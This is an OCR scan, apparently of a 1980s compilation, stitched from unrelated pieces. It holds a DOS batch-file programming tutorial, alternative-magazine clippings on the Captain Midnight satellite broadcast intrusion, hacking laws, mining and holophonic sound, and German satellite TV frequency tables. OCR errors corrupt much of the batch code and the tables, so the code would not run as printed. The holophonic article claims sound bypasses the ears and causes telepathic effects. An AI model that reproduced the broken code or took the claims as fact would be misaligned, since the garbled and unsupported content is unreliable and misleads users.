files to it with a batch file containing
the following: , , ^
FOR %%@ IN(%1 %2 %3 %4 %5
%6 %7 8% 9%) DO PRT %%@
This is fast enough, hut is limited to
nine arguments. This little program
will accept unlimited arguments, us¬
ing SHIFT: I
:D0
iP o/^i@==@ goto ENDDO
PRT %1
SHIFT
GOTO DO
:ENDDO
or quicker:
:PR0C
iP goto ENOPROC
PRT %1
FOR %%@ IN(SHIFT GOTO) DO
%%@ PROC
:ENDPROC
This is the most general form that
will not execute if there are no argu¬
ments. A shorter (and therefore fes¬
ter) Version of this basic loop may be
used, but this form will execute at
least once, even if there are no argu¬
ments. Use it by all means if this
does not matter.
••LOOP
PRT %1
SHIFT
IF NOT %1(a = =@ GOTO LOOP
or quicker:
:LOOP
PRT %1
for %%@ IN(SH1FT IF) DO %%@
NOT %1@= = @ GOTO LOOP
If we can use CRLF.BAT to break
out of the program, we can have the
( best of both worlds.
:LOOP
IF %1(®==@CRLF
PRT %1
FOR %%@ IN(SH1FT GOTO)
You may want to create a complex f
batch file to automate an obnoxious |
procedure, but perhaps you don't r
use it often enough to remember its \
complex call syntax.
The answer to this is to set the
batch file up so it will give you some
instructions if calied with no argu¬
ments. For example, here is the Start
of my batch program 'DL0AD.BAT'
which permits unattended download-
ing of partitioned datasels from the
IBM mainframe, a procedure that
could take hours. The actual down-
load procedure is so slow that batch
file speed is a negligible factor, so
nothing is compressed into FOR
loops here.
ECHO OFF
CLS
IF NOT %'1@==@G0T0 START
ECHO DOWNLOAD PARTITIONED
DATASETS from MAINFRAME
ECHO
ECHO SYNTAX: DLOAD DSN DIR
MEMBERI MEMBER2
MEMBER3...
ECHO Where DSN is the fully
qualified dataset name,
ECHO DIR is the
destination subdirectory.
ECHO and MEMBERn
are any number of member
names.
CRLF
; START
SET DSN = %1
SHIFT
SETDIR=%1 _
FOR %%@ IN(MD SHIFT) %%@ \ /o1
MD\%1 >NUL
SHIFT
:D0
1F%1@==@CRLF
<DOWNLOAD PROCEDURE>
SHIFT
GOTO DO ,
Several techniques are used in this
program. If DLOAD is entered with
no arguments, the first IF Statement
detects this, and the instructions are
echoed. When DLOAD is calied with
arguments, the first variable is set to
%DSN% for later use by <downloacl
procedure>, then is shifted away.
The second variable (now %1) is
stored as %DIR% and then creates
the desired subdirectory before
banishment by shifting. The 'mem-
bers' are shifted in turn into Position
%1 by the loop, until they are all
used up. Exils from the program are
by fast calls to CRLF.BAT, which was
created earlier. If the attempt to
make the subdirectory fails, perhaps
because the subdirectory already ex-
ists, the resulting error message will
be shunted off to NUL.
Menus
Fig 1 Shows a program to control
some settings for an Epson/lBM-type
Printer. It will display a menu if cal¬
ied without argument, but this menu
may be bypassed if the user knows
what to enter.
Calling batch files
Now we will see how we can call
another batch file and return from it,
as though it were a subroutine. If
you Chain to another batch program,
that's it — there is no return. The
secret of true calls is the 'COM¬
MAND' Statement.
'COMMAND' loads another copy of
pari of COMMAND.COM into mem-
ory and gives it control. This does
not consume as much memory as
IBM would have you believe, since it
does not load another copy of the
whole 28k or 40k COMMAND.COM —
it only loads another copy of the
command processor which is about
4k. The new command processor
runs quite independently of the pre-
vious one.
The command 'EXIT' purges the
currently executing command pro¬
cessor and puts you back to the pre-
vious one. EXIT does nothing if en¬
tered into the one and only original
command processor.
It is not obvious what the use of
this is until you remember file re-
direction. What happens if the new
command processor takes its input
from a ff/e? Try it by making a file
full of commands, ending with EXIT.
We'll call it GIZMO. (If you don't end
this file with EXIT you'll never return;
the Computer will hang up for good )
VOL
ECHO This line is from
the calied file.
VER
EXIT
Next create DR1VE.BAT and run it-
ECHO OFF
CLS
ECHO This line is from
the main program.
PP.BAT
ECHO OFF
CLS
IF NOT %1@==@ GOTO %1
ECHO Enter PP E for elite
ECHO PP W for Wide
ECHO PP B for BOLD
ECHO PP R to reset printer
CRLF
:E
ECHO "[M*[rG >PRN
CRLF
:P
ECHO ■[P>PRN
PP P for pica
PP C for Condensed
PP D for doublestrike
COMMAND <GIZMO
ECHO This line is again
from the main program.
This illustrates the general princi-
ples. We can vastly improve on this,
though. The special form:
COMMAND/C String
says, in effect, to invoke a new com-
mand processor, feed it 'string' as an
input command, execute the com-
mand, then EXIT. If we feed a com¬
mand processor a batch file name, it
executes the batch file. Because of
this we can rename GIZMO to GIZ-
MO.BAT and drop the EXIT com¬
mand from the end, thereby Convert¬
ing it into a plain vanilla batch file.
Change DRIVE.BAT as follows;
ECHO OFF
CLS
ECHO This line is from
the main program.
COMMAND/C GIZMO
ECHO This line is again
from the main program.
This is almost the effect we want.
We are spared the Installation mes-
sage from the command processor,
but the secondary command proces¬
sor echoes everything. Even if you
put ECHO OFF at the beginning of
GIZMO.BAT it will still echo the first
prompt and the ECHO OFF, If it is
really important to silence every¬
thing, you can use redirection.
Change the programs as follows:
GIZMO.BAT:
VOL >CON
ECHO This line from the
calied file. >CON
VER >CON
DRIVE.BAT:
ECHO OFF
CLS
ECHO This line from the
original batch program
COMMAND/C GIZMO >NUL
ECHO This line again from
the calied program
The trick here is to send all output
from the secondary command pro¬
cessor into NUL. Then we override
this in the calied batch file with re-
directions to CON for everything we
really want to see. (More examples
on this are given below.)
This call/return procedure can be
nested to any depth that your mem-
ory allows, and you can play tricks
with variables. Try these three batch
programs.
MAIN.BAT
ECHO OFF
CLS
ECHO MAIN here. Are you watching?
COMMAND/C SUBFILE1 file speak
sub %1 >NUL
ECHO Whew! We made it back to
MAIN again.
SUBFILE1.BAT
ECHO This is %3%1 1 %2ing. »CON
COMMAND/C %3%12 %1 %2 %3
%4
ECHO Goodbye from %3%1 1.
>CON
SUBFILE2.BAT
ECHO Now %3%1 2 %2s. >CON
IF NOT %4@==@ ECHO
What does "%4" mean? >CON
Try launching this collection with
'MAIN' and 'MAIN AXOLOTL'.
More practically, suppose I have a
lot of programs to download from
the mainframe with DLOAD.BAT.
What I want are several members
from each of several partitioned
datasets. This whole procedure
might take all night — I plan to sub-
mit a huge metabatch file when I go
home in the evening. I can create a
driver for DLOAD.BAT and off we go:
COMMAND/C DLOAD BNW.TE.CLIST
TECLIST Ml M2 M3 M4 ...
COMMAND/C DLOAD BNW.TE.SAS
TESAS Ml M2 M3 M4 ...
COMMAND/C DLOAD BNW.TE.
TABLES
TETABLES Ml M2 M3 M4 ...
If nothing goes horribly wrong, I
should return in the morning to find
the selected members neatly copied
into appropriate subdirectories.
Recursion
By now you may be saying 'All that
is very well, but if a batch file can be
made to call another file, what would
happen if you asked it to call itselfor
maybe call another batch file that
calied the first one, or maybe...'
Being of an inquisitive nature I ex-
plored some of these questions. The
answer, in general, is that you can
have any number of recursive chains
or calls, so long as memory and file
handles are available. If you are care-
ful of Counts and end conditions, you
won't get in too much trouble. On
the other hand, if one of these were
to run away ...
To ease into this subject, we'll con-
sider recursive chaining first. Recur¬
sive chaining is an alternative to SET
that initialises variables for further
use by the program. The difference is
that this way the program sets %1
through %9, so an Operation like
SHIFT might be used against them.
Nothing fancy is needed for recursive
chaining. Consider a file calied
CHAIN.BAT:
ECHO OFF
CLS
IF %i@==@ CHAIN 123456789
:D0
ECHO <DO SOMETHING WITH
FILE%1>
SHIFT
IF NOT %1@==@ GOTO DO
Here is a catalogue printer for your
hard disk. Your various subdirec¬
tories are 'remembered' in the re¬
cursive call Statement.
CAT.BAT
ECHO OFF
CLS
IF %1@==@ CAT DBASE LOTUS
ORD WRK C
CD\
DIR I SORT >PRN
:LOOP
DIR\%1 I SORT>PRN
FOR %%@ INISHIFT IF) DO %%@
NOT %1@==@ GOTO LOOP
CAT.BAT will print catalogues for
any arbitrary’ selection of directories
if calied like this:
CAT DIR 1 DIR2 DIR3...
Suppose you have a file card
ACTION.DATA which expects to find
data in the form of tokens in a file
calied DATA.BAT. Possibly DATA-
.BAT was generated by another prog¬
ram which could be another — or
even this — batch file. DATA.BAT
contains a Statement as follows:
ACTION DATA1 DATA2 DATA3 .. .
ACTION.BAT Starts as follows:
IF %1@==@ DATA
As we can see, if ACTION.BAT is
calied with no arguments, it will im-
mediately chain to DATA.BAT which
calls ACTION right back, passing
DATA1, DATA2, DATA3 ... to it as
%1,%2, %3...
So far I haven't been able to think
of something I needed to do with
batch Processing that couldn't be
done more easily some other way.
No doubt the Lisp-wallahs out there
will immediately think of several im¬
portant applications. On the other
hand, this may be one of those case
which vividly illustrates the differ¬
ence between what you get away
with and what's useful. n?Ii1
Quelle unbekanm
American executives calied it “video terrorisrn
but there was no denying a Champion of the atiz-
ens had been born. John MacDougall 25, of Flor¬
ida, alias Capfain Midnight, patched a 4/a minute
message onto a Home Box Office movie beamed
to American viewers via a Hughes Communicafions
satellife.
Appropriately, the message came across tne
broadcasting on April 27th. 1986 °Mhe movie
The Falcon and the Snowman, which dealt with
security penetration of classified mformation y
the American Soviet agent Christopher Boyce.
Captain Midnight’s Statement was a warning:
his brief message,that home satellite viewers would
fight back, sent chills down the spine of every
broadcast execu tive in the co untry.
THERE CMi -1 ii /Ti
■ pouanr, COMRAPE öENE^RAL . T I jl
R OUR SATELüTe ^WöRK y
IS UNDEB ATTACM. y ^
Massive amounts of sensitve American Defense
Department information was carried along the
same commercial satellite networks that MacDou¬
gall exposed as vulnerable to Computer hackers,
pranksters or satellite Saboteurs. MacDougall had
instigated his message from a commercial broad¬
cast facility - making not only HBO or Hughes ex¬
ecutives but defence officials even more anxious.
If MacDougall had chosen to point his antenna
at a Pentagon satellite instead, the/American mpn-
-itoring of those channels might have assumed that
the Soviets were about to fire their bombs and
were taking the first step by jamming US ability to
retaliate.
via Mother Jones Oct. ‘86
T OlO NOT THE THINK THE ^
AMERICAH5 SO POOUSf^..J
HACKING LAWS
A meeling of Federal and
State atlorneys-general in
March will outline new Uws
which will render Computer
hacking an offence. Their
Hm will be to stop people
interfering with data bases.
At present it is an offence
to physically damage a Com¬
puter System but tarnpering
with the information inside a
computer's memory has not
been covered by law. A work¬
ing party has been operation¬
al since November to look into
Computer crimes/law. This
was done after a report by
the Tasmaniar» Law Reform
Commission was presented to
a meeting of Attorneys-Gener¬
al. A recent case in Perth in-
volved Donald McLeod who
programmed the Australian
Bureau of Statistics Computer
to dump its memory störe.
Chis. Mery doie,
t'lovj -(ry aßain
leach mining
In Western Australia some
mystery surrounds French ur-
anium leach mining. The
French energy glant, Total has
been extracting yellowcake from
a vast uranium deposit near
Onslow using the environmenta-
My destructive method of Solut¬
ion mining. The French have
exported tonnes ot yellow cake
from their Manyingee prospect.
Uranium “exploration” licerice
in W.A. apparently means tests,
trials, yellow cake production
and export. But such severe
damage has been inflicted by Sol¬
ution mining that State Parli-
ament is Icoking at legislation
for environmental protection by
banning solution mining
For more info CONTACT: Shy-
Peeble Box 889 Kalqoorlie.
Hc was fined $200 after ad-
mitting his ‘prank‘ to Federal
Police stating that he knew
there was a back up disc.
life for half a kilo
eensland brought in some of the
toughest drug laws in the Wo.*
ern World.
Under the Drugs Misuse Act
possession of two grams of her-
oin or cocaine or 0.004 of a gram
of LSD cavries a mandatory lifo
sentence.
The extraprdinary draconian ai
legislation stipulates the samo *
sentence for trafficking and gives
Police Wide powers to tap private *
phones. ^
People in possession of 500 '
grams of cannabis can be jailed
for life. ‘
AFÄ Mit nm
MAGGIE’S FARM Alternative Network Magazine - Issue 35 - 1987
-ÜSr * 4«-
I)olop][)ontc
siounb
— the "Feelies” of the future?
A 26 year old Italian scient-
ist living in London has invented
new sound technique that
broadcasts a frequency pattem
directly to the brain, by-passing
the ears altogther.
Originally deveioped in re-
search to heip the deaf, holo-
phonic sound is set to be one of
the major technological break-
throughs of the ‘80’s that puts
Stereo, quad or any other conven
-tional spatial effect very much
in the kiddie’s playpen division.
"Holophonic Sound” is in the
patent process in nine European
countries. CBS-U.K. will soon
release an album of holophonic
sound effects.
Major recording artists like
Paul McCartney and Peter Gab¬
riel have approached the inventor
HUGO ZUCCARELLI and his
Partner sound engineer, Mike
King.
Zuccarelli believes the ear/
brain generates its own refer-
ence beam. Using a technique
analogous to the laser beam in
holograms external sounds are re-
corded with synthesized referen-
ce sounds. The brain provides
its own second reference beam
and “decodes” the holophonic
record reproducing the original
ambient conditions.
Not only does holophonic
sound create a third-dimension
sound enwironment, it triggers
other sensory modalities aswell.
This extraordinary "synesthesia”
could launch a major new dir-
ection in brain research and her-
ald thai entertainment of the
brave new worid, The “Feelies”.
For example, the sound of a
match being struck elicts the
smell of sulphur. A voice whisp-
ering dose to the ear is accomp-
anied by a Sensation of warm
breath. The super reality of the
perceived sound either triggers
off complementary sensations, or
other sensory “information” can
also be encoded onto the frequen
-cy phase waves directed to the
brain."
The total effect of a holo¬
phonic recording is like a multi¬
dimensional “picture” created by
phase interference patter-
ns or, quite simply, sound.
W^^^ELECTRIC AIR WAVES
¥
i
I
Listeners typically describe the
effect as “realer than real". It
has a stränge penetrating inten-
sity.Holophonic sound is appar-
ently audible to many hearing
impaired individuals. Blind list¬
eners report strong visual imag-
ery. People wearing head-sets in
grqups together report surprising
telepathic effects.
Zuccarelli has approached
sound recording from a thorough
Knowledge of brain physiology
rather than acoustics or electron¬
ic engineering. If Zuccarelli’s
biologically-based technology all-
ows for the encoding of more
than sound, we enter a whole
new realm of being able to re-
play a total experience. A future
holophonic recording played on
digital tape equipment could
create its. own compelling envir-
onment. CONTACT:- Zuccarelli,
78 priory Rd, London, N8.
The Explosion of
Community Radio
Country airwaves are sudden-
ly alive with the sound of music.
The remarkabte explosion of in-
terest In community FM radio
and participation medla over the
p3St two years has turned the FM
dial in many local sreas into a
"homegrown" treat. Well over
a thousand new community FM
jicences have been applied for
We checked in on a collect-
ive meeting at each Station and
discusscd program tapes **inter-
swap" between community stat-
Ions, as weil as arranging for
future Maggie's Farm radio pro-
The rapid increase in Citizen
initiative networks and “altern-
ative''media has Maggie’s Farm
blitzed by fresh data and pub-
iications from all over the worid
-always far more than can be
collated into one little magazine.
pulting most recent applicat-
^ ions on an 18 month waiting
^ list.With the new community rad-
io Station, 2RBM—FM budding
^ near the Maggie's Farm Southern
^ base in The Blue Mountains -
first test broadcast in May-some
^ of the Maggie's crew visited
^ 2BOBFM in Taree and 2BBB FM
I''
1
in Bellingen to swap notes.
ti
We have been looking at various ^
ways of sharing this “over splll“ rM
of excellent current news and ^
ideas with the network at large,
Even Maggie’s Interviews in the ^
field, given broadcast quality,
can be shared on community
radio, going into much more ^
ränge and depth that prInt media ^
allows.
As interaction between key ^
network groups and blossoraing
community radio develops^ we ^
can expect the rieh variety of
“alternative" media and Citizen ^
initiative groups to lend much ^
flavour to the airwaves.
-Editoral Collective ^
jS
MAGGIE S FARM Alternative Network Magazine - Issue 35 - 1987
^ .
i^iiM
horizontal
vertikal
60° Ost
INTELSAT VA - F12
Erste Zwischen¬
frequenz
Frequenz-
Bereich
13° Ost
^TELSAT W (EOS 1)
27,5° VVest
INTELSAT VA - f
horizontal T «
MHz
horizontal vertikal
GHz
B-irr
SAT-TV-PROGRAMMTABELLEN
DIE SATELLITEN Ul
950
« DiesGs Programm wird über den Ostbeam abgestrahlt und ist deshalb nicht in der gleichen Qualität wie die anderen
Programme zu empfangen
„Film Net", „Premiere" und „BBC" werden verschlüsselt abgestrahlt.
„Sky Channel" momentan unverschlüsselt.
spaltet den Transponder zeitweise auf, um zusätzlich „RAI-DDE” zu übertragen.
In der nachstehenden Tabelle wird außer der Original-SAT-
Abstrahlfrequenz in GHz auch die erste Zwischenfrequenz im
Zwischenfrequenzbereich 950 - 1700 MHz und im Zwischgn-
frequenzbereich 1284 - 1534 MHz (Telecom) aufgeführt.
DER HAUPTSATELLIT
4
SAT-TV-PROGRAMMTABELLEN
D IHRE PROGRAMME
Die Weltkugel ist in dieser Grafik auf den Kopf gestellt, was
Ihnen das Finden der einzelnen Satelliten erleichtern soll.
Ausgehend vom Eutelsat 1 - F1 (ECS-1), der etwa im Süden
steht, finden Sie den Intelsat VA - F12 links im Osten und den
Intelsat VA - F11 rechts im Westen.
SATTV-Programme mit Videotext
RAI UNO
SKY CHANNEL
SKYTEXT
SUPERCHANNEL
SUPERTEXT
WDF-WEST3
■ BAYERN 3
BAYERNTEXT
8° West
TELECOM 1A
Frequenz- Erste Zwischen-
Bereich frequenz
7° Ost
EUtELSAT 1-F2
10° Ost
EUTELSAT 1 - F4 (ECS 4)
1° West
INTELSAT VA-F2
horizontal
horizontal
vertikal
horizontal
i-IVIAC Fernsehsystem
© = C-MAC
0 = C-MAC/Tandberg
© = SECAM
Ji SAT-TV-PROGRAMMTABELLEN
DIE SATELLITEN UND IHRE PROGRAMME
Stereokanalpaarungen Telecom 1A • 8° West
Die Weltkugel ist in dieser Gralik 'auf den
Kopf gestellt, was Ihnen das Finden der
einzelnen Satelliten erleichtern soll.
' Xnl ;'T
';ri lv
RS
■‘f«5 -y:
i7sa
.t-yxAr-:
12564^
12606
. AIa'.,.,-
'12648
„»2fi90-
_ fO
2.3S Miz
1
(
L f6
S,80 »ftz
1 1
1 1
r
'
ß,20 Mtz
Frequenzbereich 12.5 • 12.75 GHz l—- - 7.75
I \ 1 _ fe - 6 ,JO Mtz
Nord -------
FERNSEHEN + RADIO ÜBER DEN FRANZÖSISCHEN TELECOM-SATELLITEN 1 A (12,5 -12 ,75 GHz)
— c^^^r|T| rHF M 1^‘^TRAHI IINGFN VERTIKAL (KEIN POLARISER NOTWENDIG.I LEDIGÜCH^ FEEDHORN)^
' ' •• _ ■ ■■ - ■ .. ' ■ ■.. .. . I 7 ■■ r-. > .Z7 ~ > ■ ' L.. , US-
TRANS-’’
PONDER
NR.
FREQUENZ
GHz.;.
TV/FERNSEHEN.Lvyi?yS'.?]y'IS7
RI
7-' / f-
.. ;:i'4
’ ^1-
12 522
ui- • - l ■
•'il’- '1
M6 (Clips-t-Musik-hUnterh.
-FFilme+Nachrichten)
von ca. 10.00 • ca. 2.00 Uhr
ca. 16 Stunden täglich
R2
'rli'lVM
IBÜ
Digitaler Business
Service-Daten ü bertragu ng
R3yi|i!
12 606
i'.-U'V •m" •
'u *• /
LA CINQ (LA 5), (FILMPRG.) S
von ca. 7.00 - ca. 1.40 Uhr
ca. 18 Stunden täglich
AQUARELLE
RTL (FRANZ.)
EUROPE 1
6.200/7.400
6.500/7.770 **
6.850/8.200 **
R4 ' \ 12 648
Träger für rechts aufgeführte
Hörfunkprogramme
EUROPE 2
6.200/7.400 **
AFP - AGENCE FRANCE
7.750
PRESS (DATENÜBERTR.)
RADIO NOSTALGIE
6.850/8.200 **
PACIFIC FM
2.700/3.150 **
SKY ROCK
3.600/4.200 ”
FUN FM
4.950/5.800
RFM
2.350/5.350 **
NRJ-RADIO ENERGIE
6.850/8.200 **
RMC
6.200/7.400 ***
KISS FM
6.500/7.750 * *
R5 . 12.690 ; ■ Gelegentliche Übertra-
■ gungen/Video-Übertragung
R6 '■' •1 12 732 '■ Übertragung digitaler
Audio-Kanäle **'*
V-.j iy irt
K1SS(13/U)****
RADIO FRANCE 1
(17/18) ****
RADIO FRANCE 2
(19/20) •*“
* * Stereo ‘ * * 2-sprachig
- 1 . Freq. links - 1. Freq. franz.
- 2. Freq. rechts - 2. Freq. ital.
Die Radioprogramme SKY ROCK, PA¬
CIFIC, RFM* sind im Audiobereich un¬
ter 4.80 MHz (handelsübliche SAT- '
Empfänger und Stereo - Processoren
verfügen normalerweise nur über den
Audioempfangsbereich von 4.80 bis
8.20 MHz) zu empfangen!
* RFM ist deshalb mit handelsüblichen
SAT-Receivern nur in Mono emn.
fangbar.
__L_---:-'______
--p^-^ris'^erden zu verschiedeneTTzeiten Spartenprogramme (z.B. 1 x wöchentlich Progr. für Arzte), abgestrahlt. Alle RadioprogrammeiÄsü);^
Auf den Kanälen R1. n5i nbweraen ZU ve SC
-'?.9iif^'g^^P;,"g"9,7d,gifalen'Audiokanäle mit handelsüblichen Salellilenempfängern nicht möglich.
i:Ä=
/Pos. -.*■
,-v . /
7 Polartfit/^ > Dfenst ^ ‘ Aiidk>-‘’ ‘ 7''.
'.r Zentrum / v^-v-ri^'beschreibuno
‘.Strahf- ~ ^ «tf^fiequenz
H'.fr^uerc ^ ^ BW Land ^ c ^‘I'O^cno* Zertrui^
Eut I-F1
13.0 E
1X(1)
WS
H-11.007
36
RAI-Uno, ftalien
6.60 MHz 47 dBW
Eut 1-F1
13.0 E
3X(3)
WS
H-11.174
36
3Sat, BRD. Österreich/Schweiz
6 65 MHz 47 dBW
Eut 1-F1
13.0 E
4X(4)
WS
H-11.472
36
TV5. Frank/eich
6,65 MHz 47 dßW
Eut 1-Fl
13.0 E
4X(4)
WS
H-11.486
36
Woridnet, USA + Sweden Today
6.65 MHz 47 dBW
Eut 1-F1
13.0 E
6X(6j
WS
H-11.650
27
Sky Channel. Arts Channel. UK
Stereo S/C:
6.65 MHz 47 dBW
7.02/7.20 MHz
Eut 1-Fl
13.0 E
1Y(7)
WS
v-io.gss
36
Tdedub. Schweiz/BR Oeutschland 6.50 MHz 47 dBW
Eut 1-Ft
13.0 E
2YC8)
ES
V.11.091
36
RTL plus, BR Deutschland
6.65 MHz 45 dBW
Eut 1-Fl
13.0 E
3Y(9)
WS
V-11,140
36
RImnet, Belgien
6.60 MHz 47 dBW
Eut 1-Fl
13,0 E
4Y(10)
WS
V-n,507
36
Sat 1, BFl Deutscfiland
6.65 MHz 47 dBW
Eut 1-Fl
13.0 E
6Y{12)
WS
V-11.674
36
Super Channel. UK,
Stereo S/C:
6.65 MHz 47 dBW
7.02/7,20 MHz .
Eut 1-F4
10.0 E
9
WS
V-11.181
27
NRK, Norwegen
C-MAC 44 dBW
Eut 1-F4
10.0 E
12Y
WS
V-11.654
36
TVE, Spanien
6.60 MHz 46 dBW
Eut 1-F2
7.0 E
1
EB
H-10.972
36
Euroviaon, EBU
Sound in Sync. 39 dBW
Eut 1-F2
7.0 E
1X(1)
EB
H-11.009
36
Eurovision. EBU
Sound in Sync. 39 dBW
Eut1-F2
7.0 E
5X(5)
ES
K11.591
36
Woridnet. USA
6,60 MHz 47 dBW
Eut 1-F2
7.0 E
3Y{9)
EB
V-11.142
36
Eurovision, EBU
Sound in Sync, 39 dBW
Eut 1-F2
7.0 E
4Y(10)
WS
V-l 1.472
36
Business TV Netvw^rk
6 60 MHz 47 dBW
Eut1*F2
7.0 E
4Y(10)
WS
V-11.676
36
Visnews
6.60 MHz 47 dBW
I-V-F2
1.0 W
36(20)
G
RH-4.08575
20
zeitw. Video
Azoren, USA & Kanada
6.65 MHz 22 dBW
1-V-F2
1.0 W
36<21)
G
RH-1.10425
20
Brightstar, USA
wechselt auf anderen Intelsat
6.60 MHz 22 dBW
I-V-F2
1.0 W
38(24)
G
RH-4.1750
30
AFRTS. USA
6 80 MHz 26 dBW
I-V-F2
1.0 W
63(2W)
WS
H-11.015
30
InfoRlm, Norwegen
6.60 MHz 43 dBW
I-V-F2
1.0 W
61(3W)
WS
H-11.133
30
Sveriges Television
SVT-1. Schweden
digital 44 dBW
4/ SAT-JV-PROGRAMMTABELLEN
SAT-TV-Aussendungen Mitteleuropa (Fortsetzung)
'’VMr.'i
1
^■^Zersnm ' fv'
W:
J-Jfaquenj
I-V-F2
1.0W
63(4W) WS
H-11.178
30
Sveriges Television
SVT-2, Schweden
digital
44 dBW
(-V-F2
1.0 w
71(2E)
ES
V-11.160
30
Israel Cable TV
6.60 MHz
44 dBW
(-V-F2
1.0W
79
ES
V-11.595
30
Israel TV-2
6.60 MHz
44 dBW
I-V-F2
1.0W
11(01)
EH
RH-3.725
20
TVGabon
6.20 MHz
22 dBW
I-VF2
1.0W
53(10)
Z/NE
LH-3.900
30
AFRTS-Süd-EufOpa Sender
6.80 MHz
30 dBW
l•VF2
1.0 w
13(10)
EH
RH-3.912
20
Tele-Sahel, Niger
5.50 MHz
22 dBW
Tel 1-Fl
8.0 W
R1(1)
S
V-12.522
30
M6 Frankreich
5.80 MHz
52 dBW
Tel 1-Fl
8.0 W
R2(2)
G
v-12.564
30
Dgitaler Business
Service/Frankreich
5.80 MHz
52 dBW
Tel1-Fl
8.0 W
R3(3)
s
V-12.606
30
La Cinq, Frankreich
5.80 MHz
52 dBW
Tel 1-Fl
8.0 W
R5{5)
G/S
V-12.708
30
zeit«. Video
5.80 MHz
52 dBW
Tel I Fl
8.0 W
R6(ß)
G
V-12.732
30
digitale Audiokanäle
5.80 MHz
52 dBW
Gor 7
n.o w
6(-1)
s
RH-3,675
40
1 Programma
7.00 MHz
46 dBW
Gor 7
11.0W
7(1)
G
RH-3725
36
Intersputnik, zeitw. Video
7.50 MHz
32 dBW
Gor 12
14.0 W
7(1)
G
RH-3.725
36
Interspuinik, zeitw. Video
©nschl. Vremya
T.50 MHz
32 dBW
Gor 12
14.0 W
9(6)
G
RH-3.825
36
(ntersputnik. zettw. Video
einschl. TV Cubana
7.50 MHz
32 dBW
Gor 12
14.0 W
L7
s
RH-11.541
36
zeitw. Video-Tests, USSR
7.50 MHz
42 dBW
I-V-F6
18.5W
38(23)
G
RH-4.1665
20
zeitw. int. Video
versch.
6.60 oder
6.65 MHz
21
dBW
I-V-F6
18.5W
38(24)
G
RH-4.1885
20
zeitw. int. Video
versch.
6.60 oder
6.65 MHz
21
dBW
I-V-F6
18.5W
71(1 E)
72(2E)
ES
V-10.995/
V-11.135 &
V-11.175
30
zeitw. int. Video, Lario. Italien
Test-Sendungen
6.65 MHz
42 dBW
I-IVA-F4
21.5 W
7B(13)
EH
RH-3.96575
18
TV Sudan
‘V'Pf'
3.99225 MHz
21 dBW
liVA-F4
21.5 W
9B{17)
EH
RH-4.04575
18
TV Zaire
^ppr
4.07183 MHz
21 dBW
1-VA-F10
24.5 W
38(23)
G
RH-4.1665
20
zeitw. int, Video
versch.
6.60 oder
6.65 MHz
21
dBW
1-VA-F10
24.5 W
38(24)
G
RH-4.1885
20
zeitw. int. Video
versch.
6.60 Oder
6.65 MHz
21
dBW
S/l T-rV-PRQGRAMMTABELLEN
SAT-TV-Aussendungen Mitteleuropa
INTELSAT/EUTELSAT/TELECOM UND GORIZONT-DIENSTE IN DER
ITU-REGION NR. 1
Poiariät/ . Otena-' •. .>
Zentfum i-,Ceachreibur»g
SlraW-
Vi.-BW : Lärij “'»if. '■
l-V-F? 66.0 E 12(06) WH RH-3.875 30 TV Algerien
l-V-F? 66,0 e 69 WS H-11.470 27 AFRTS Türkei
I-V-F7 66.0 E 69 WS H-11.650 30 TRT-1 Türkei
I-V-F7 66.0 E 69 WS H-11.680 30 TRT-2 Türkei
l-V-FS 63,0 E 11(01) WH RH*3.70e 27 SABC Südafrika
SCPC 22 dßW
@ 3696 MH2
&MAC 42 dBW
6.65 MHz 42 dBW
6.65 MHz 42 dBW
B-MAC 33 dBW
SfraWandeagnalionen- G ■ Global; SG ■ hamisphäriscb; 2 > Zoft«; S b Punirt/Spot; 2/NE - 2on« Nofdo»; WS - Westspol: ES - Oslspot; EM - dsd. Hernisphife:
WH w«tl. Hentscbdr«; ES - EufOSfrabl — Polartläton; RH » fscbtsafebeod. zirkular; LH ■ IioKsörebena. zirkulär: H ■ Honzortaf; V ■ Venriiai — BW ■ Barxibreite.
SCPC - t Träger o<o (Me Träger-Frequenzen snd m GHz angegeben).
■ (S<ehe auch separate Listen Zur AudioUntertriger in Ster« sowie Audio-Unienräger lüi HPrfunkprogramfre.)
U sat-jv-programmtabsllen
l-VA-FII 27.5 W 21(04) EH
' ZenWJi^,,;-
^/frequet^
30 Worldnet, USA
I-VA-F11 27.5 W 24(16) EH RH-4.0225 20 TV Übyen
I VA-F11 27,5 W 25(18) EH RH-4.0645 20 NTA Channel 10. Lagos. Nigeria
l-VA-FII 27.5W 36(20) G
I-VA-F11 27 5 W 87(21) G
RH-4.095 20 TV Nacionale de Chile
LH-4.125 27 FBIS, USA
6.60 MHz
6.20 MHz
SCPC
4.03723 MHz
6.60 MHz
B-MAC
I-VA-Fl 1 27.5 W 69(5/6W) WS
27 Sateilitervlnfo Service
l-VA-FII 27.5 W 71(1£) ES V-10,995 30 zeitw. Video, UK
l-VA-FII 27.5W 73(2E) ES V.11.155 30 Cable News
Network/CNN. USA
6.65 MHz
6.65 MHz
24 dBW
26.5 dBW
I-VA-Fl 1
27.5 W
61(1W} WS
H-10.975
30
MTV Europa
6,65 MHz
44 dBW
I-VA-Fl 1
27,5 W
61 (2W) WS
H-11.015’
30
Children’s Channel, UK
6.60 MHz
45 dBW
I-VA-Fl 1
27.5 W
61 (2W) WS
H-11.015
30
Premiere, UK
6,60 MHz
45 dBW
t-VA-F11
27,5 W
63(3W) WS
H11.135
30
Kindernet, Holland
6,65 MHz
44 dBW
IVA-Fll
27.5 W
63(3W) WS
H.11.135
30
Lifestyle
6,60 MHz
44 dBW
I-VA-Fl 1
27.5 W
63(3W) WS
H-11.135
30
Screen Sport
6,60 MHz
44 dBW
l-VA-FII
27 5 W
63(4W) WS
H-11,175
30
BBC 1/2
6 65 MHz
43 dBW
I-VA-Fl 1
27.5 W
79{3E)
ES
V-l 1.470
30
EBU-PVS, Washington D.C,
6.60 MHz
41 dBW
I-V-F4
34,5 W
53(10)
Z/NE
LH-3.9075
20
TVE-1, Spanien
6.65 MHz
21 dBW
I-V-F4
34,5 W
24(14)
EH
RH-3.9795
20
TVE-2, Spanien
6.60 MHz
23 dBW
I-V-F4
34.5 W
38(23)
G
RH-4.1665
20
zeitw. int. Video
versch.
6.60 oder
6,65 MHz
21
dBW
I-V-F4
34.5 W
38(24)
G
RH-4.1885
20
zeitw. int. Video
versch.
6.60 oder
6.65 MHz
21
dBW
l-V-FO
53,0 W
21(02)
EH
RH-3.7425
20
TV Portugal
6.65 MHz
26 dBW
I-VF3
53.0 W
25(05)
EH
RH-3.798
20
TV Marocaine, Marokko
SCPC
24 dBW
I-V-F3
53.0 W
38(24)
G
RH-4.175
30
ATC TV. Argentinien
6.65 S/C
26.5 dBW
